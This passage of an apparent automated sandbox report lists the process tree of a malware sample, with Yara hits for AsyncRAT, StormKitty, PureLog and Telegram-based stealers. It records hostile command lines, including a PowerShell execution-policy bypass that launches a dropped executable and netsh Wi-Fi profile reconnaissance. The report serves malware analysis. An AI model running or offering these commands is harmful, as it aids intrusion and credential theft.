                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:timeout 3
                                                                                                                                                                                                                                Imagebase:0xaf0000
                                                                                                                                                                                                                                File size:25'088 bytes
                                                                                                                                                                                                                                MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                                Start time:07:27:39
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                                                                                                                                                                Imagebase:0x1f0000
                                                                                                                                                                                                                                File size:48'640 bytes
                                                                                                                                                                                                                                MD5 hash:C709136E78750FEB6CB85F99EDA16629
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000018.00000002.3189493490.000000000511F000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000018.00000002.3214014251.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000002.3214014251.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000018.00000002.3214014251.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000018.00000002.3188525129.0000000005100000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000002.3174046241.0000000003807000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000018.00000002.3152328073.00000000029C5000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000018.00000002.3207543510.0000000006A20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000002.3217843417.0000000006D60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000018.00000002.3191349230.000000000515B000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.3152328073.00000000029CD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000018.00000002.3136390098.00000000008EC000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000018.00000002.3152328073.000000000283E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000018.00000002.3152328073.000000000283E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: unknown
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                                                Start time:07:28:04
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\xj40xovMsm.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\xj40xovMsm.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff68a180000
                                                                                                                                                                                                                                File size:15'088'640 bytes
                                                                                                                                                                                                                                MD5 hash:1082572A44D4C41214A3C38DCD8289F9
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:26
                                                                                                                                                                                                                                Start time:07:28:09
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' & exit
                                                                                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                                                Start time:07:28:09
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                                                Start time:07:28:11
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"'
                                                                                                                                                                                                                                Imagebase:0x880000
                                                                                                                                                                                                                                File size:433'152 bytes
                                                                                                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:29
                                                                                                                                                                                                                                Start time:07:28:11
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                                                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:30
                                                                                                                                                                                                                                Start time:07:28:11
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:31
                                                                                                                                                                                                                                Start time:07:28:13
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\chcp.com
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:chcp 65001
                                                                                                                                                                                                                                Imagebase:0x150000
                                                                                                                                                                                                                                File size:12'800 bytes
                                                                                                                                                                                                                                MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:32
                                                                                                                                                                                                                                Start time:07:28:15
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\ProgramData\KMSAuto\accc.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\ProgramData\KMSAuto\accc.exe"
                                                                                                                                                                                                                                Imagebase:0x580000
                                                                                                                                                                                                                                File size:631'296 bytes
                                                                                                                                                                                                                                MD5 hash:BED8CDCED2D57BE2BD750F0F59991ECD
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_KeyzetsuClipper, Description: Yara detected Keyzetsu Clipper, Source: 00000020.00000002.2548612553.0000000002897000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_KeyzetsuClipper, Description: Yara detected Keyzetsu Clipper, Source: 00000020.00000002.2548612553.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:33
                                                                                                                                                                                                                                Start time:07:28:17
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                                                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:34
                                                                                                                                                                                                                                Start time:07:28:17
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:35
                                                                                                                                                                                                                                Start time:07:28:18
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:netsh wlan show profile
                                                                                                                                                                                                                                Imagebase:0x1560000
                                                                                                                                                                                                                                File size:82'432 bytes
                                                                                                                                                                                                                                MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:36
                                                                                                                                                                                                                                Start time:07:28:18
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:findstr All
                                                                                                                                                                                                                                Imagebase:0xe30000
                                                                                                                                                                                                                                File size:29'696 bytes
                                                                                                                                                                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:38
                                                                                                                                                                                                                                Start time:07:28:20
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\chcp.com
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:chcp 65001
                                                                                                                                                                                                                                Imagebase:0x150000
                                                                                                                                                                                                                                File size:12'800 bytes
                                                                                                                                                                                                                                MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:39
                                                                                                                                                                                                                                Start time:07:28:22
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"
                                                                                                                                                                                                                                Imagebase:0x230000
                                                                                                                                                                                                                                File size:327'680 bytes
                                                                                                                                                                                                                                MD5 hash:C28490DA01887AA59D82C54B576DC107
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: MALWARE_Win_A310Logger, Description: Detects A310Logger, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: ditekSHen
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:40
                                                                                                                                                                                                                                Start time:07:28:22
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                                                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:41
                                                                                                                                                                                                                                Start time:07:28:23
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:42
                                                                                                                                                                                                                                Start time:07:28:23
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:netsh wlan show profile
                                                                                                                                                                                                                                Imagebase:0x7ff726ad0000
                                                                                                                                                                                                                                File size:82'432 bytes
                                                                                                                                                                                                                                MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:43
                                                                                                                                                                                                                                Start time:07:28:24
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:findstr All
                                                                                                                                                                                                                                Imagebase:0xe30000
                                                                                                                                                                                                                                File size:29'696 bytes
                                                                                                                                                                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:44
                                                                                                                                                                                                                                Start time:07:28:25
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\chcp.com
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:chcp 65001
                                                                                                                                                                                                                                Imagebase:0x150000
                                                                                                                                                                                                                                File size:12'800 bytes
                                                                                                                                                                                                                                MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:45
                                                                                                                                                                                                                                Start time:07:28:29
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                                                                                                                                                                Imagebase:0xdd0000
                                                                                                                                                                                                                                File size:48'640 bytes
                                                                                                                                                                                                                                MD5 hash:C709136E78750FEB6CB85F99EDA16629
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000002D.00000002.2707163319.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000002D.00000002.2773682295.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:46
                                                                                                                                                                                                                                Start time:07:28:30
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                                                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:47
                                                                                                                                                                                                                                Start time:07:28:30
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\relog.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\relog.exe
                                                                                                                                                                                                                                Imagebase:0x7ff698010000
                                                                                                                                                                                                                                File size:53'760 bytes
                                                                                                                                                                                                                                MD5 hash:F445286ECB5A74AAF2C103D05879F1C1
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:48
                                                                                                                                                                                                                                Start time:07:28:31
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:49
                                                                                                                                                                                                                                Start time:07:28:31
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:netsh wlan show networks mode=bssid
                                                                                                                                                                                                                                Imagebase:0x1560000
                                                                                                                                                                                                                                File size:82'432 bytes
                                                                                                                                                                                                                                MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:50
                                                                                                                                                                                                                                Start time:07:28:32
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\chcp.com
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:chcp 65001
                                                                                                                                                                                                                                Imagebase:0x150000
                                                                                                                                                                                                                                File size:12'800 bytes
                                                                                                                                                                                                                                MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:51
                                                                                                                                                                                                                                Start time:07:28:34
                                                                                                                                                                                                                                Start date:06/07/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:netsh wlan show networks mode=bssid
                                                                                                                                                                                                                                Imagebase:0x1560000
                                                                                                                                                                                                                                File size:82'432 bytes
                                                                                                                                                                                                                                MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
